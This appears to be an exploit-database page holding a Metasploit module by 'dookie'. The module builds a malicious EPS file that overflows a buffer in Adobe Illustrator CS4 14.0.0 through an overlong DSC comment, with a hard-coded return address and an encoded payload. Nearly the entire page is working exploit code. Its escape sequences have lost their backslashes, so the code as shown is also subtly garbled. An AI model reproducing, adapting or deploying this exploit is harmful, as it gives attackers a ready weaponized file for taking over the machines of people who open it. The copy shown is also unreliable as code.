Adobe Illustrator CS4 v14.0.0 eps Universal Buffer Overflow (meta)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Adobe Illustrator CS4 v14.0.0 eps Universal Buffer Overflow (meta)
# Published : 2009-12-07
# Author : dookie
# Previous Title : gAlan 0.2.1 Buffer Overflow 0day Exploit
# Next Title : gAlan (.galan file) Universal Buffer Overflow Exploit

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Adobe Illustrator CS4 v14.0.0',
			'Description'    => %q{
					Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
    overlong DSC Comment Buffer Overflow Exploit 
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'dookie, original by Nine:Situations:Group::pyrokinesis' ],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'URL', 'http://www.exploit-db.com/exploits/10281' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},					
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "x00x0Dx0Cx0A",
					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					[ 'Windows Universal', { 'Ret' => 0x4B4B5173 } ], # CALL ESI in icudt36.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 03 2009',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME',   [ false, 'The file name.',  '9sg.eps']),
				], self.class)

	end

	def exploit
		
		header = "xc5xd0xd3xc6x20x00x00x00x05xc8x04x00x00x00"
		header << "x00x00x00x00x00x00%xc8x04x00xb5Ix01x00xff"
		header << "xffx00x00"
		header << "%!PS-Adobe-3.1x20EPSF-3.0rn"
		header << "%ADO_DSC_Encoding:x20Windowsx20Romanrn"
		header << "%"
		sploit = rand_text_alpha(41699)
		sploit << [target.ret].pack('V')
		sploit << rand_text_alpha(2291)
		sploit << "%Title:x20Untitled-1.epsrn"
		sploit << "%AAAAAAAA"
		sploit << payload.encoded
		trailer = ": Arn"
		trailer << "%%For:x20aliasrn"
		trailer << "%%CreationDate:x2011/27/2009rn"
		trailer += "%%BoundingBox:x200x200x20227x20171rn"
		trailer += "%%HiResBoundingBox:x200x200x20226.5044x20170.3165rn"
		trailer += "%%CropBox:x200x200x20226.5044x20170.3165rn"
		trailer += "%%LanguageLevel:x202rn"
		trailer += "%%DocumentData:x20Clean7Bitrn"
		trailer += "%ADOBeginClientInjection:x20DocumentHeaderx20"AI11EPS"rn"
		trailer += "%%AI8_CreatorVersion:x2014.0.0r"
		trailer += "%AI9_PrintingDataBeginr"
		trailer += "%ADO_BuildNumber:x20Adobex20Illustrator(R)x2014.0.0x20x367x20Rx20agmx204.4890x20ctx205.1541r"
		trailer += "%ADO_ContainsXMP:x20MainFirstr"
		trailer += "%AI7_Thumbnail:x20128x2096x208r"
		trailer += "%%BeginData:x204096x20Hexx20Bytesr"
		trailer += "%0000330000660000990000CC0033000033330033660033990033CC0033FFrn"
			
		eps = header + sploit + trailer

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(eps)   

	end

end